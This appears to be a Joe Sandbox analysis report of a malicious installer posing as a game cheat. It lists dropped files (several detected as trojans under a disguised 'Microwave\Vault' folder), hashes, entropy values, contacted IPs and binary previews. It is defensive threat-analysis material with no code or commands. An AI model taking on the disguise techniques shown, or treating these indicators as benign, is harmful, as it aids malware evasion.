            C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\qrcode-terminal\bin\qrcode-terminal.js0%ReversingLabs
            C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\networkbroker.exe29%ReversingLabsWin64.Trojan.Mardom
            C:\Users\user\AppData\Local\Temp\shi3348.tmp0%ReversingLabs
            C:\Windows\Installer\MSI12E1.tmp0%ReversingLabs
            C:\Windows\Installer\MSI9F3.tmp0%ReversingLabs
            C:\Windows\Installer\MSIC26F.tmp0%ReversingLabs
            C:\Windows\Installer\MSIC28.tmp0%ReversingLabs
            C:\Windows\Installer\MSIC2DF.tmp0%ReversingLabs
            C:\Windows\Installer\MSIC30F.tmp0%ReversingLabs
            C:\Windows\Installer\MSIF889.tmp0%ReversingLabs
            C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exe31%ReversingLabsWin64.Packed.Generic
            C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe33%ReversingLabsWin32.Trojan.Generic
            C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe79%ReversingLabsWin32.Trojan.CrypterX
            C:\Windows\Installer\MSIBF92.tmp0%ReversingLabs
            C:\Windows\Installer\MSIBFC2.tmp0%ReversingLabs
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            NameIPActiveMaliciousAntivirus DetectionReputation
            raw.githubusercontent.com
            185.199.110.133
            truefalse
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              72.21.81.240
              unknownUnited States
              15133EDGECASTUSfalse
              23.41.168.93
              unknownUnited States
              6461ZAYO-6461USfalse
              185.199.110.133
              raw.githubusercontent.comNetherlands
              54113FASTLYUSfalse
              IP
              127.0.0.1
              Joe Sandbox version:40.0.0 Tourmaline
              Analysis ID:1417308
              Start date and time:2024-03-28 22:44:20 +01:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:defaultwindowsinteractivecookbook.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:150
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • EGA enabled
              Analysis Mode:stream
              Sample name:JWQgbclQK5
              renamed because original name is a hash value
              Original Sample Name:148c3096bab88a675414bd9463c60c44317f3ee5d12f949526847827cb108010
              Detection:MAL
              Classification:mal100.troj.evad.win@261/1107@1/11
              • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
              • Excluded IPs from analysis (whitelisted): 23.41.168.93
              • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, e16604.g.akamaiedge.net, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
              • Not all processes where analyzed, report is missing behavior information
              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
              • Report size getting too big, too many NtCreateFile calls found.
              • Report size getting too big, too many NtCreateKey calls found.
              • Report size getting too big, too many NtOpenFile calls found.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryAttributesFile calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
              • Report size getting too big, too many NtSetInformationFile calls found.
              • Timeout during stream target processing, analysis might miss dynamic analysis data
              • VT rate limit hit for: JWQgbclQK5
              Process:C:\Windows\System32\msiexec.exe
              File Type:data
              Category:dropped
              Size (bytes):3162991
              Entropy (8bit):6.70395609945764
              Encrypted:false
              SSDEEP:
              MD5:2DC0C71715C250A0BE56F047D61967A2
              SHA1:C8D58B602B2697AF245C0E2841E3E3D58597D9E4
              SHA-256:D0AEA8AC498C967A4F68E70A11604DD93DFD4DBABFB8804F1705CC256EB29BE1
              SHA-512:7E559CAA8AB59FFFB86B29FE59BA04C251255BFB2BA368AEFD51CAE923CC9181266F23BC0F4F50E4A6BE8F4479EDDDF704258063ED3A93A1F45DE207AFDBF22E
              Malicious:false
              Reputation:unknown
              Preview:...@IXOS.@.....@..|X.@.....@.....@.....@.....@.....@......&.{AA26797C-3E2C-42C1-A832-A687DE957A1C}..CheatInstaller..YTtSTCHEAT.msi.@.....@.. ..@.....@........&.{E80C0689-9541-4B8A-A2F7-42C1223131F6}.....@.....@.....@.....@.......@.....@.....@.......@......CheatInstaller......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{7CB67576-CC77-4A95-904F-CC1D1FDF3D96}&.{AA26797C-3E2C-42C1-A832-A687DE957A1C}.@......&.{7EBC63B1-6868-42AD-8F42-7A8483E554C1}&.{AA26797C-3E2C-42C1-A832-A687DE957A1C}.@......&.{7E3DCA32-366C-4D87-A97D-D5E4A4578089}&.{AA26797C-3E2C-42C1-A832-A687DE957A1C}.@......&.{ACFCF79F-5E36-4077-84BD-3303CD7A90A3}&.{AA26797C-3E2C-42C1-A832-A687DE957A1C}.@......&.{F9E007D5-91EB-4408-A0A4-8C8437DF0983}&.{AA26797C-3E2C-42C1-A832-A687DE957A1C}.@......&.{A69A28B5-470F-489A-8931-C429028C48B8}&.{AA26797C-3E2C-42C1-A832-A687DE957A1C}.@......&.{2C5DBEFA-34DB-435F-8EED-21D4846CB058}&.{AA26797C-3E2C-
              Process:C:\Windows\System32\msiexec.exe
              File Type:RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, mono 16000 Hz
              Category:dropped
              Size (bytes):2438444
              Entropy (8bit):4.300253169532062
              Encrypted:false
              SSDEEP:
              MD5:F759D9F3F35DDA05908011FCAED1D018
              SHA1:0A7852907851700F7424094B7658D78743559DAE
              SHA-256:1780F4481AAE5BC51FB79A42D92946ADE0C5459EFD99DAA67BF2D1DCAE275919
              SHA-512:6CB7AB0AC9CB17D194B2A635DAB9E5934D36623BE7C126785CD83E1D98FE55A262068BC2676FD1499A07A1160005AFF7D6199E9BE544FAD4581DEBCDDF1B0390
              Malicious:false
              Reputation:unknown
              Preview:RIFF$5%.WAVEfmt .........>...}......data.5%...........................................................................................................................................................................................9.....(.....1.+.....N.....(.].D...z...O...T.z.................6.......c.-..."...;.......&.....b...U.$.L.........8.....9.....q.....&.......'............................................................................................................................................................................................. .......................................................................................................................................................................................................................................................*.................................................................................................................................................................................................
              Process:C:\Windows\System32\msiexec.exe
              File Type:RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, mono 16000 Hz
              Category:dropped
              Size (bytes):975404
              Entropy (8bit):5.586244671954126
              Encrypted:false
              SSDEEP:
              MD5:5ACAB132E4BAF883D7F785FABF624952
              SHA1:DCD1E3FE209CEA31E72531E1484B6BB156347308
              SHA-256:E14563629A67F07764F12CFAE343D8DDB0309CBDA241391D095FBB6109302DD1
              SHA-512:714ED7D425424006FBF248C2E5B95E6525F4ABC6E563ECF544FE52F12881AF7CF8BD73E790657766E545E753C23F1BD363DDE8B6FABA675BCA147A22CC802C3C
              Malicious:false
              Reputation:unknown
              Preview:RIFF$...WAVEfmt .........>...}......data....=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.....m.....m...m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.......m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.....m...m.m.m.m.m.m.m.m.....m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m...m...m.m.......m.m.m.m.m.m.m.............................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Windows\System32\msiexec.exe
              File Type:RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, mono 16000 Hz
              Category:dropped
              Size (bytes):2438444
              Entropy (8bit):4.241206394989403
              Encrypted:false
              SSDEEP:
              MD5:1F17C039E805F0366322565C65C44A96
              SHA1:58F9A9787E412E22BDFDF80EE989CD0CA76B7EC6
              SHA-256:618F46233CB90B39D0DA37F37033C0F181ECE8583F814CE41C11D1A4D5C49666
              SHA-512:2980F1616F9CC569CC5ECBAA6C71016488867BF0D2C53B51DEDD828F5DA12921C3582DE61F127CA566F5D35C9398AF6AA4BC3600845EF569FC8EC5388BDF7DCA
              Malicious:false
              Reputation:unknown
              Preview:RIFF$5%.WAVEfmt .........>...}......data.5%.J.S.Z.[.X.].c.k.y.}...............................|.v.n.f.].L.B.8.0.'.............................................................................&.%...../.Y.<...".K.R.0.".8.@./.........................................7.9. .....$.0.........,.%.......".9.9.".$.>.R.?.....%.<.=.*.......G.L.4.........;.C.........).D.T.?.!.*.7.I.S.S.D.%...,.0.:.A.7.....).=.$.................................................$.........Q.J.......O.).........................................................................................!.".........5.8.........[.\. .......{.........'...j.......S...[.....&.r.l./.....-.Y.a.I.$.....O.R.C.0.+."...-.K.D.!...............................................................................1.,. .%.8.M.L.?.7.2.?.C.:...........................................).).........-.Z.a.R.J.N.R.d...................................y.g.........q._.`.y...Y.%..... .....................................................................................
              Process:C:\Windows\System32\msiexec.exe
              File Type:RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, mono 16000 Hz
              Category:dropped
              Size (bytes):2438444
              Entropy (8bit):4.555497048138907
              Encrypted:false
              SSDEEP:
              MD5:0F9223E9FDB356D794EBEF388A0BF432
              SHA1:4CEEDE02E49E2FAE1A3851B3FF58DE226B2CA970
              SHA-256:E99D3F16C079D80C3F8EE5F897828A0D2934A6C7C0170D17AD6DB3A0CE9C52D1
              SHA-512:4B89E85B19F760F025E06E338107834FA5E02FD58197166228CF664C09BA1335DBF2056A55A3015DCE933DB7E4E04893592F99768BE79E4D79328007E9E183B6
              Malicious:false
              Reputation:unknown
              Preview:RIFF$5%.WAVEfmt .........>...}......datab.+.*.N.L.C.8.g.0.4.X...=.(...-. .....!...............".".<...D.0.................................2...1.$.....).)...............................................!.......%.'.#.........-.....................................................................................
              Process:C:\Windows\System32\msiexec.exe
              File Type:RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, mono 16000 Hz
              Category:dropped
              Size (bytes):2438444
              Entropy (8bit):4.128775964352952
              Encrypted:false
              SSDEEP:
              MD5:CF7E23B55069463BB897E1D80257B0C2
              SHA1:39E1E3BE1495678B60A14DAC1247B5411FA4B2CC
              SHA-256:C9B064614012BBE92168A41C47493B35194840A8BCDF5B7238EDCF26EB075900
              SHA-512:418AC4C4C7D87EA18CC3B8E03144ECBE323A8098469B79226261EE26EB87FBE274AA81253E688B06C96A5EB04682749E9B2F761E2547452614E7FCB0F32A38AC
              Malicious:false
              Reputation:unknown
              Preview:RIFF$5%.WAVEfmt .........>...}......data.5%.......................D.N.....3...Q.....v.mi.|.....y.a.].u...~.i.l.y.z...............................................&.0.6.>.<.<.<.B.J.D.8.7.6.9.6.2.8.C.I.I.0.....$.
              Process:C:\Windows\System32\msiexec.exe
              File Type:RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, mono 16000 Hz
              Category:dropped
              Size (bytes):2438444
              Entropy (8bit):3.6630222105223442
              Encrypted:false
              SSDEEP:
              MD5:14857C23DCC708DAD22E36F138EAD789
              SHA1:A9DCB7F0661B046FBA30C3312CAFE96F5F8D76DD
              SHA-256:1823AA8025A0BD7B909A3BB1B514BE13E17DC049F448C016925EC1F3E64BF7EC
              SHA-512:1FE0812D56EFCFC3E5D8339421C0C0A6761D4A1F637C6BB2B29FF456261FF30BAFC004C568EC2565A76FF402BCA787A182055278EE3D1F5C8F1937E2C60B015D
              Malicious:false
              Reputation:unknown
              Preview:RIFF$5%.WAVEfmt .........>...}......data
              Process:C:\Windows\System32\msiexec.exe
              File Type:RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, mono 16000 Hz
              Category:dropped
              Size (bytes):2438444
              Entropy (8bit):2.811605148312355
              Encrypted:false
              SSDEEP:
              MD5:149CD5CC6A68E10130DB2C4A03D71DE0
              SHA1:4BE908D4048EEBB86E3B5C95964C4BC156282DDA
              SHA-256:6A30422FCE563F3A084020EB86A3A728C3CF1EB04506E081E0FA7BBCA9B54EE1
              SHA-512:478038839937CBF277534635DA1561B9D448ECD3B51CA00F1109417A45969777E2B523ECC065F781599E7CB4A2B80ACFEEDB7528E8FE8683C4B3D7788A38047E
              Malicious:false
              Reputation:unknown
              Preview:RIFF$5%.WAVEfmt .........>...}......data.5%.........H.........:.o.u.....s...p.v...c.>.T...j.a....".'.%--..7*71x8_9.9.C.=.>4AsA.R.GYCfSJJ.8.[=W.?.C.DuN@D.J.I.Ta@.B.J.A.C.C.>.G.?.;<;.<.=D;J;>-`6w-}#%&..V#..B.....................4.w..C...,..7.O...6.......^._...........1.F......>..........>.........D...).`.....-.......|......}.8...1..........v...0...........=...h...l.(.I.u....8....f...f...d.....l.A...D.....h.T. ...\ . .$.%.%.)B*?+.,.,s..-..o/.,I-H/+282.2.3>5.7.8.7.6.7/:.9.:.=@=p=.<.<.=.?.@R?.?HA.?.>y=.<.;.:x=.?i?~?S?.>.>.=.<.<$=.:.9.=.=.:.9):R:z9_9.8.8T819.9.7.4.2.2.3.4r1.0C2.4.4~2.0.0./q..-.,.*>+.+.+.+@+K*.).).(.&.&.&.%.%d$.#. . ..X 8 ......h.w.%.......Q.......o.......<.....{...v.........f.*.D...#.....6... .T.......5.....s....J...3.........|......P......e.....,....../.....+.......d..:.<.B.....,.|... .i.R.^.......^.........(.k...C...r.M...A.........n.....%.N.....!.......l.%...q...N...Z..........~.N...u.l.....>...].K.s...../.%.@...D........Z......_.Y..
              Process:C:\Windows\System32\msiexec.exe
              File Type:RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, mono 16000 Hz
              Category:dropped
              Size (bytes):2438444
              Entropy (8bit):4.5906045417477666
              Encrypted:false
              SSDEEP:
              MD5:5392A5FB1C3D0CE48EE2F6DB8C8C157C
              SHA1:694AD4D5939FA7D468399150A026A3EFCE6773BF
              SHA-256:1033B1227E5A7814B34221274272B384F0F8DDBE31A600FF070EF1F0C1FEE901
              SHA-512:1A0CE0C2C5D4818EB83F38C4C3328EB4AAB653A625E0E1FCA5338E23F955D4DA206C3B0BB3106A89736E69077F75079A3BC54FDC458CEBE7389CC8A727E31988
              Malicious:false
              Reputation:unknown
              Preview:RIFF$5%.WAVEfmt .........>...}......data.5%.........................../.............O.....`.....=.<.....5.Y...........3.............7.9.R...Q...o.........g...........W...........b.m.....d.....:.l...T.........N._.....`...)...Z...........t...................o.!.p...m.......C.f
              Process:C:\Windows\System32\msiexec.exe
              File Type:RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, mono 16000 Hz
              Category:dropped
              Size (bytes):3676844
              Entropy (8bit):7.065320582158372
              Encrypted:false
              SSDEEP:
              MD5:F764169BFFE65099EDA80ACE5F90E046
              SHA1:82BCAEC9920FFABC3C6EA08A277511C2E871B230
              SHA-256:88341A5EE3600529B8026D421D2B6004299D9BC3D89BDB3E2A8643CCA107F3ED
              SHA-512:3EEDF74FEB8A30E2DDB6767B25580625E7D200E34E8A20A7412BC4E60D8CA5194C7D2436A632CEDC676D93841A560BD0DE9470D48F6EEE4A4AD3B7D5F4064D80
              Malicious:false
              Reputation:unknown
              Preview:RIFF..8.WAVEfmt .........>...}......data..8........9.|.$.....p....@.s.m/.;.?D=.9.3.+. D.h...{....<...1.....%.;.L.]...c...k..$.&t$o!................K......x.....U....J........`...Y.................i.?...h. .Z...[...d.....T.:.......=...g.....r.j...A.p..............)..3.%.|..R...;...G.....N.+.....'....l.....o....". ........j.V.q.|.m.....S.{...-.x.#..!.(.,},.(}!_._.....N.C..........{.......V.`...r.....o.a.....t.h.!.k......'.+.)y!..p...C..."............."='.'R$/.......$.....8.X.J.......H...].P.......................&....$.,...+.#..............!...6.......Q.;..!.%.%."/.........U.....c...7.w.V.O..V.....7.E.#...V...t.(.........K.V...V.N.*.~...8.[......M.m.8...... ..;...^.(.G ;%.'`&..j...R.......z............*.D...r..............D...6.f..........&.-=/i+.$. . ?#C'.+71.6c7P4...'+ ........w.............h.u.....@.>.I.^.._.H.................N...,.?...j.D.....).i.O.-#.!....e...2.].N.o...+.......^.C...E&|,t0.0.-.'6 ....X. ....,.k.....Q.........4......~.N.......
              Process:C:\Windows\System32\msiexec.exe
              File Type:RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, mono 16000 Hz
              Category:dropped
              Size (bytes):2438444
              Entropy (8bit):4.544332618581673
              Encrypted:false
              SSDEEP:
              MD5:189AE0C626D6D7287E0FFED4389CCB05
              SHA1:EC64C9F7B9FA6D6879793317E8431AC69338DDB8
              SHA-256:F43A43E58ECD71A43A1393A6C6A3056228E525963704ED75AE04BD5FBCD2305F
              SHA-512:973E344A2D266A1EB1BD848945C3CFCC16E5C4F0AA9E71F6FDFD96B9E7A18CBCA630239257BF69B0922DAE275E364068609BE6D42F6A6209E853B2FF0600790C
              Malicious:false
              Reputation:unknown
              Preview:RIFF$5%.WAVEfmt .........>...}......data.5%...............................................................................................................................................................................................$.'."...............................................$...(.?.B.L.k.q
              Process:C:\Windows\System32\msiexec.exe
              File Type:RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, mono 16000 Hz
              Category:dropped
              Size (bytes):2438444
              Entropy (8bit):3.176546861877274
              Encrypted:false
              SSDEEP:
              MD5:6EB8849162425BF473A9A86F8765E014
              SHA1:4D439D545B09D5711A3E85C68FF43C6C39934A85
              SHA-256:33C47E6D4A82A09134205811A63ED78A1DE4AF1F61FB04C921785AD91E3ECAEF
              SHA-512:A630AF5C1A517BD652F689C98E8D6C4438C1A34C2E847F52AA61DCB1C64F5296B286A6FEE715A865061EE3B26A72B904617C913C34299F0C402F8149D2D7F943
              Malicious:false
              Reputation:unknown
              Preview:RIFF$5%.WAVEfmt .........>...}......data.5%.............................................................................................!.*.=.`...........p.l.m.....................................^.;...w.........n.,...........$.....0.G.../.....c...L.....0.......F.....}.).m.!.,.1...........<.\.4.*...Y.r.....................Q.....O.......C.......~...W.w.............l...e...........................!.C.f.......-.~...+.Q.m.|.......O.3.................v.\.F.3.................N.......a.1.....=.....k.L.].6.8.d...<.6.7.u......... ...........j.........M.....................&.|...T.3.....}...$.k...(.b...................).a.k...........+.;.;.=.P.u...............+.^.........#.b.......<...................................}.l.L.....s.....u.(.........Z.N.;...$.M.G.........I.....p...L.S......... .....O.'...a...~. .a.......8.a.%...........Q.I.(...o.I.s.....L.....}.J.'.............,.....{._.@. .....i.*...........K...(.L.X.^...........#.L.j.l.....................................x.g.m.p.n.\.[.H.>.=.G.K.M.n.
              Process:C:\Windows\System32\msiexec.exe
              File Type:RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, mono 16000 Hz
              Category:dropped
              Size (bytes):2438444
              Entropy (8bit):4.641987743167123
              Encrypted:false
              SSDEEP:
              MD5:EE5FB4B49FE3D85F8A18D622D155C1B7
              SHA1:3CB420A5B81952E8B02C71402F79FB2D14AE696A
              SHA-256:C4017D513A85A3DBDE5EA42EE0C500E19A392147793C30E51F4B8E4AF0AFD751
              SHA-512:48DF84936AB9940D809930A595E6DDBF77B9CA00F5A2426CA0B5E77C30A636A44FDDBCAD99C16BB40805928F6AA1BE34308425549FC318440A3C87D52A7F5D74
              Malicious:false
              Reputation:unknown
              Preview:RIFF$5%.WAVEfmt .........>...}......data.5%...................................................................................................3.Y.n.n.w...~.>.................i._.z.......L.c.......o...S.~.....[...........0.}.F...2...%.....@...[.6...&...r.......N...#...........:.....}.........N.......l.Y...E.....#.....d..._...k.....~...u.........#.....e.C.......q.5...5.>...)...=.K...#...............!.X.D.C...2.......f...K...X..._.q...A...............l.X.q...q.....i.P...l.......6.......5.....l.............).w...&...*.........d.....?...=.........\...6.........N.O...S...}.L.}.....................Z...].C.....h.....N........."...z...(...r...U.......I.......J.........1.v.x.>.........4.................[.........h.N.............L.)...Q...(.".\.\.^...............G.......l.....$. .....).......t.......@...-.g.*.........q.........D..................Z.\.d...4...6...~.[.M...w.v.....L...X...5.........i.~.*...v.........:.....]...........{.h.....K.O._.....P.....4.......U...h.'.I...(...D.......m...j.....
              Process:C:\Windows\System32\msiexec.exe
              File Type:RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, mono 16000 Hz
              Category:dropped
              Size (bytes):2438444
              Entropy (8bit):5.400406598514635
              Encrypted:false
              SSDEEP:
              MD5:84CB9D76404E7060326ED19DC51A9A1F
              SHA1:5945326BBC8B4E48AFBEA13F8C2CF564FFBAFBEE
              SHA-256:C6CA1F7B252C74AE234C25F37B8EB0122945BE66701BF22486C3C27DE8D9908B
              SHA-512:95F3FDAB34EF9A3C4B797A50C2B00D068DA4D309E6AAD2B288C140D71A5EF45F182D36A97B99768F50FC226217B7B7AB6D4A4BA3EDE529EFA801CDBFEA575D28
              Malicious:false
              Reputation:unknown
              Preview:RIFF$5%.WAVEfmt .........>...}......data.5%.Z...`.I.............x.e.i.d...................H.........&.......u.....^...t... ...;.....3.........f.....L....._.i.....l.../.~.a.....K.'....._.....q.........k.,.n...............-.P.+.b...g...-.K.......k.y...z.E.....x.L.:.......q...e.+.o...O.....\.{.......G...r...W...X.....i.N....'.)...d...........=...N...........!...^.....:.......M...=...].-.......J.o.{...j...+.6.w.......?.Q.#.L.'.Q...........-.).........%...r.....M.....%.A...>...[....d.{...'.............2.P.|.u...C...v.......".....X...............V.-.R...................&.......e.T.H...T...............;...?.t._....... .>.1.?.O...R.V.B.^.......i.S.>...........x.....?.[.h.....l.*.K...0.k.....h...................y...@...G.....~.......L...P.e.9.....*...^.).u.0.......G.{.P.N.^.U.{.......v.....Z.....P.o...1.-.y...6...+.......y.........................-.^.6...N.......P...|.=.A.....S...*.|.....J.L.O.....r.........H...................t.{...k.:.....6.N.............G.....?...,.".G...V...F...S.M.......
              Process:C:\Windows\System32\msiexec.exe
              File Type:MySQL table definition file Version 9, type MYISAM, MySQL version 50568
              Category:dropped
              Size (bytes):9582
              Entropy (8bit):1.3205678494415076
              Encrypted:false
              SSDEEP:
              MD5:AC330F2A89A6C828059D1F125CB9CB60
              SHA1:A40B10EAE1FBA1EA43FF70B3941A165D6D0502F2
              SHA-256:9B2123A554181148E29BBEB66F18DA5619B1FD796E4F3DE49415748822FEF4EC
              SHA-512:0FD4AC721C969496423C336128C8B3751F3752176C891D85E13CBFC226FCFA00751AAB1D1D400EE6B70031B6ABAA86FB975F45F30B6C0E8789DF27904DEDCC42
              Malicious:false
              Reputation:unknown
              Preview
              Process:C:\Windows\System32\msiexec.exe
              File Type:MySQL table definition file Version 9, type MYISAM, MySQL version 50568
              Category:dropped
              Size (bytes):10239
              Entropy (8bit):2.0207286607375723
              Encrypted:false
              SSDEEP:
              MD5:2620F56F03159589486B831D9B6ADC4A
              SHA1:55DFC135BE75692BD64C50B429DCD5460E0B0B90
              SHA-256:8438F31C41C8214D92EF0227B0E45EAE937E6E5221E410AF1AD3735DC9E2EE71
              SHA-512:2915B402391B79635679F415C085646FA3FA6A888B4D00EE9BE8AAC101760815DF6DD390B76192C5D695A116DFD2D297A1E3323B678B184E320049061B974F01
              Malicious:false
              Reputation:unknown
              Preview
              Process:C:\Windows\System32\msiexec.exe
              File Type:MySQL table definition file Version 10, type FEDERATED_DB, MySQL version 50568
              Category:dropped
              Size (bytes):8776
              Entropy (8bit):0.3803412978519604
              Encrypted:false
              SSDEEP:
              MD5:EA26BB989E3E2C321A47D499D2682AE1
              SHA1:A79E8C99186C20FB09F1457B3D183538E1E1B1BB
              SHA-256:4A208C39AC55C440FA336C3463428609DB81112512F6551A1331A516A2D1DA81
              SHA-512:07F2B43DB67B76B463C1770DD6DDB445BBCEFCD8F8DFB85E9C28306CF5282272805516DD3166851B66A8358E16632A09A524D6918AAE8711D97939BEDA53137E
              Malicious:false
              Reputation:unknown
              Preview
              Process:C:\Windows\System32\msiexec.exe
              File Type:MySQL table definition file Version 9, type MYISAM, MySQL version 50568
              Category:dropped
              Size (bytes):8770
              Entropy (8bit):0.5548157076089201
              Encrypted:false
              SSDEEP:
              MD5:CCACA741F4002CB8AF48D485501EC8E9
              SHA1:4895716A9BAF869A5BA2EC1C2D0523B7BC8A6CB3
              SHA-256:0E2099AA021C0A2819F8F80960D729E66F69754675BFE847AF8923029A330EC1
              SHA-512:09F005F1E7E8F9F388031C673A593C8AFAC42298B6F97FF708BABFBC403A952692A0BBFBAB3EBBD89F8506C2EC7BDB4154F70827680B6DFD390F80054FF2910A
              Malicious:false
              Reputation:unknown
              Preview
              Process:C:\Windows\System32\msiexec.exe
              File Type:CSV text
              Category:dropped
              Size (bytes):6954
              Entropy (8bit):3.5394337841151686
              Encrypted:false
              SSDEEP:
              MD5:89E2A161DF2EF245781707FF93E978BC
              SHA1:AB2189D5C8DCA09CADE0586B929F0264C327DB32
              SHA-256:B8F747BABF732BB64A9CFC60A09B79001C87EB3B37D9704174C0964A49ED6F4A
              SHA-512:0E78E380198330CB143B17490D4540473D359A0198888DFD59FF5B1A94A8637F0E6E8998D2EA6EF83794D41771DB449BB4ABDC2692872A21EBD7D585652B4115
              Malicious:false
              Reputation:unknown
              Preview:..0.0.0.1.,.".U.s.a. .n.o.m.i. .c.a.r.t.e.l.l.e. .l.o.c.a.l.i.z.z.a.t.i.".....0.1.0.3.,.".A.g.g.i.o.r.n.a.m.e.n.t.o. .v.i.a. .i.n.t.e.r.n.e.t.".....0.4.0.0.,.".A.n.n.u.l.l.a.".....0.4.4.1.,.".E.m.a.i.l.".....0.4.4.2.,.".S.t.a.m.p.a.".....0.4.4.3.,.".C.o.n.t.i.n.u.a.".....0.4.4.4.,.".E.s.c.i.".....0.4.4.7.,.".S.i. ... .v.e.r.i.f.i.c.a.t.o. .u.n. .e.r.r.o.r.e. .i.n.a.s.p.e.t.t.a.t.o. .c.h.e. ... .s.t.a.t.o. .b.l.o.c.c.a.t.o. .d.a.l.l.'.a.p.p.l.i.c.a.z.i.o.n.e... .I.n.v.i.a. .i.l. .r.a.p.p.o.r.t.o. .s.u.l. .b.u.g. .v.i.a. .e.m.a.i.l. .a. .'.%.1.'. .c.o.s... .c.h.e. .i.l. .p.r.o.b.l.e.m.a. .p.o.s.s.a. .e.s.s.e.r.e. .a.n.a.l.i.z.z.a.t.o. .e. .c.o.r.r.e.t.t.o. .i.l. .p.i... .p.r.e.s.t.o. .p.o.s.s.i.b.i.l.e...".....0.4.4.8.,.".Q.u.e.s.t.o. .t.i. .p.e.r.m.e.t.t.e. .d.i. .s.t.a.m.p.a.r.e. .i.l. .r.a.p.p.o.r.t.o. .b.u.g...".....0.4.4.9.,.".Q.u.e.s.t.o. .t.i. .p.e.r.m.e.t.t.e. .d.i. .l.a.n.c.i.a.r.e. .i.l. .p.r.o.g.r.a.m.m.a. .d.i. .p.o.s.t.a. .e.l.e.t.t.r.o.n.i.c.a. .e. .a.p.r.i.r.e. .u.n. .n.u.
              Process:C:\Windows\System32\msiexec.exe
              File Type:MySQL table definition file Version 10, type FEDERATED_DB, MySQL version 50568
              Category:dropped
              Size (bytes):8976
              Entropy (8bit):0.5626510207571208
              Encrypted:false
              SSDEEP:
              MD5:5CF177C70E9BE2F41ADC86EA7E0FC48B
              SHA1:9A597F4D25A0FB4837FA06B9B3792DE65FAE9551
              SHA-256:9276BFD579B31E71A0F85E8B1085E6F00AAFC1428B3C5DEE2E765E80C34260A3
              SHA-512:054F52C54DD936A87AD49F1B31FBF248962AD6909686A98E3B76C6772F7FFBB09E6ECB336C3FF6499EADD45746E407C90992FE5E93F44D0E7FEEE4CAB1E071A1
              Malicious:false
              Reputation:unknown
              Preview
              Process:C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exe
              File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
              Category:dropped
              Size (bytes):69993
              Entropy (8bit):7.99584879649948
              Encrypted:true
              SSDEEP:
              MD5:29F65BA8E88C063813CC50A4EA544E93
              SHA1:05A7040D5C127E68C25D81CC51271FFB8BEF3568
              SHA-256:1ED81FA8DFB6999A9FEDC6E779138FFD99568992E22D300ACD181A6D2C8DE184
              SHA-512:E29B2E92C496245BED3372578074407E8EF8882906CE10C35B3C8DEEBFEFE01B5FD7F3030ACAA693E175F4B7ACA6CD7D8D10AE1C731B09C5FA19035E005DE3AA
              Malicious:false
              Reputation:unknown
